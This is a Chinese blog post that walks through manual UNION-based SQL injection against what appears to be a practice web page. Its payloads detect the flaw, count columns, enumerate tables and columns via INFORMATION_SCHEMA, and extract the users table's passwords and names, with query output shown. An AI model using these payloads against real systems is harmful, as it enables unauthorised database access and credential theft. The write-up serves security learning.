SQL注入片段

最新推荐文章于 2022-10-23 14:54:43 发布
最新推荐文章于 2022-10-23 14:54:43 发布
阅读量394 收藏
点赞数
分类专栏: 我爱搞安全 文章标签: sql injection
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wgwgnihao/article/details/45291429
版权

1.在submit左边的文本框中输入特殊字符‘ ‘ ’,之后报错:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

可以推测存在注入漏洞,并且知道后台数据库是MYSQL。

2.假设后台的查询语句可能是:select 列 from 表 where ID=? ,如果在语句后面加上 or 1=1,看看效果,但是还是会报错。同上

3.或许注释掉SQL后面部分的语句能够结局这样的问题。所以可以尝试输入'or 1=1 --',结果如下图:


4.下面使用union获取更多的信息,首先'union select 1,--'之后结果如下图:


5.再输入'union select 1,2 --',结果如下图:


6.分别输入union select 1 --和union select 1,2,3 --都会报错:

The used SELECT statements have a different number of columns

可以猜测该表为两列

7.接下来输入:'union select 1, table_name from INFORMATION_SCHEMA.tables --',结果如下:

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: CHARACTER_SETS

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: COLLATIONS

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: COLLATION_CHARACTER_SET_APPLICABILITY

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: COLUMNS

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: COLUMN_PRIVILEGES

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: ENGINES

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: EVENTS

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: FILES

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: GLOBAL_STATUS

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: GLOBAL_VARIABLES

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: KEY_COLUMN_USAGE

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: PARTITIONS

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: PLUGINS

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: PROCESSLIST

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: PROFILING

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: REFERENTIAL_CONSTRAINTS

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: ROUTINES

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: SCHEMATA

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: SCHEMA_PRIVILEGES

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: SESSION_STATUS

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: SESSION_VARIABLES

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: STATISTICS

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: TABLES

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: TABLE_CONSTRAINTS

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: TABLE_PRIVILEGES

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: TRIGGERS

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: USER_PRIVILEGES

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: VIEWS

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: guestbook

ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: users
8.最后两个应该是要使用的表guestbook和users

9.输入:'UNION SELECT 1, column_name from INFORMATION_SCHEMA.columns where table_name = 'users' -- '

结果如图列出来所有的列名:


11.输入'union select NULL,password from users -- ',获取密码,结果如下图:


12.最后使用concat函数列出所有列的信息:

'union select password,concat(first_name,' ',last_name,' ',user) from users -- ',结果如下图:


ok,打完收工。

会飞的幸运儿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
php is_numberic函数造成的SQL注入漏洞
01-21
一、is_numberic函数简介国内一部分CMS程序里面有用到过is_numberic函数,我们先看看这个函数的结构bool is_numeric (mixed $var)如果 var 是数字和数字字符串则返回 TRUE,否则返回 FALSE。...上面这个片段程序是判
SQL注入 :出现The used SELECT statements have a different number of columns错误
qq_46494827的博客
05-02 1892
The used SELECT statements have a different number of columns错误
SQL注入详解(全网最全,万字长文)
热门推荐
m0_56691564的博客
10-23 3万+
一些概念:SQL:用于数据库中的标准数据查询语言。 web分为前端和后端,前端负责进行展示,后端负责处理来自前端的请求并提供前端展示的资源。而数据库就是存储资源的地方。而服务器获取数据的方法就是使用SQL语句进行查询获取。
SQL注入
zxc_jkl的博客
09-01 78
1.SQL注入 大家都不陌生,是一种常见的攻击方式。攻击者在界面的表单信息或URL上输入一些奇怪的SQL片段(例如“or ‘1’=’1’”这样的语句),有可能入侵参数检验不足的应用程序。所以,在我们的应用中需要做一些工作,来防备这样的攻击方式。 在一些安全性要求很高的应用中(比如银行软件),经常使用将SQL语句全部替换为存储过程这样的方式,来防止SQL注入。这当然是一种很安全的方式,但我们平时开发中,可能不需要这种死板的方式。 例: String sql = "select * from user_tabl
SQL注入的一般过程
lifanxin的博客
05-07 1万+
SQL注入的一般过程概述SQL注入一道例题总结 概述   SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。SQL注入大致可以分为两类:数字型注入和字符型注入SQL注入   这里介绍下SQL注入的基本流程,需要明确的是在实际注入中,我们都是无法看到具体的后端代码的,也就是无法知晓具体的SQL拼接
sql注入详解
m0_67392811的博客
06-12 5488
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
SQL注入攻击介绍
99度灰的博客
03-30 2万+
SQL注入攻击介绍 一、SQL注入攻击简介 SQL注入攻击是指,后台数据库操作时,如果拼接外部参数到SQL语句中,就可能导致欺骗服务器执行恶意的SQL语句,造成数据泄露、删库、页面篡改等严重后果。按变量类型分为:数字型、字符型;按HTTP提交方式分为:GET注入、POST注入、Cookie注入;按注入方式分为:报错注入、盲注(布尔盲注、时间盲注)、堆叠注入等等。 二、SQL注入分类 按变量类型分类:如SQL语句为select *from user where param=1(数字型)、select *fr
SQL注入原理以及Spring Boot如何防止SQL注入(含详细示例代码)
12-29
SQL注入是一种针对数据库的攻击技术,攻击者通过在应用程序的输入字段中插入或“注入”恶意的SQL代码,从而在数据库服务器上执行非授权的SQL查询。这种攻击可能导致数据泄露、数据篡改、甚至执行任意命令。 SQL注入...
这款插件旨在帮助Mybatis初学者生成动态SQL片段.zip
04-28
Mabits的动态SQL还允许开发者使用参数化查询,可以防止SQL注入攻击,并增强程序的安全性 学习经常用的几个标签 2.标签 标签是Mabits动态SQL中最常用的一个标签之一,它的作用是根据给定条件包含或排除不同的部分,以...
基于约束的SQL攻击
12-14
绝大部分开发者都意识到SQL注入漏洞的存在,在本文我想与读者共同去探讨另一种与SQL数据库相关的漏洞,其危害与SQL注入不相上下,但却不太常见。接下来,我将为读者详细展示这种攻击手法,以及相应的防御策略。  ...
php-SQL-Maker
06-22
如果不在strict模式下使用,SQL_Maker 有一个 JSON SQL 注入漏洞。 因此,我强烈建议在strict模式下使用 SQL_Maker。 您可以通过传递'strict' => 1来打开strict模式: new SQL_Maker ( array ( . . . , 'strict' ...
111
jackcily的博客
11-17 722
拓展:burp suite 攻击分为三步: 1.Fingerprinting 需要收集什么信息? web application and technology in use 什么手段? 在进行实验之前,首先使用nmap 扫描一下 victim 对外开放的端口 nmap 10.0.2.10 扫描结果如下: Starting Nmap 7.70 ( https://nmap.org ) at 2018...
SQL注入之报错型注入(详细演示)
Firebasky的博客
05-07 1488
SQL有很多方法,当一个方法想不通的时候就需要换一个方法,这里主要介绍SQL的报错型注入*(大佬绕过)* 使用场景 当进行对一个网站SQL注入的时候,发现页面上没有显示位但是有sql语句执行错误信息输出。 什么是显示位:在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数 据展示在页面中,这个展示数据的位置就叫显示位 。 构造payload 介绍函数 a. Extr...
注入shellcode
H888001的博客
11-08 1261
shellcode是能够放在任何地方都能够执行的机器码 2.编写shellcode原则 一:不能有全局变量 二:不能调用系统函数 三:不能嵌套调用函数 3.编写shellcode实战 一:shellcode分为基本模块和功能模块,结构如下图: FS:[0]是TEB 从FS:[0X30]对应peb,偏移找到当前线程的dll模块链表,找到模块基地址, 利用pe导出表知识...
android手机应用源码Imsdroid语音视频通话源码.rar
05-20
android手机应用源码Imsdroid语音视频通话源码.rar
营销计划汇报PPT,市场品牌 推广渠道 产品 营销策略tbb.pptx
05-20
营销计划汇报PPT,市场品牌 推广渠道 产品 营销策略tbb.pptx
JavaScript_超过100种语言的纯Javascript OCR.zip
05-20
JavaScript
JavaScript_跨平台React UI包.zip
05-20
JavaScript
node-v16.17.0-headers.tar.xz
最新发布
05-20
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
sql注入payload
09-01
SQL注入payload是一种用于测试和利用SQL注入漏洞的代码片段。以下是一些常见的SQL注入payload的示例: 1. 基于单引号字符型注入的payload: ' OR 1=1 -- 这个payload的目的是通过在注入点处插入注释符和逻辑运算符...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

会飞的幸运儿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值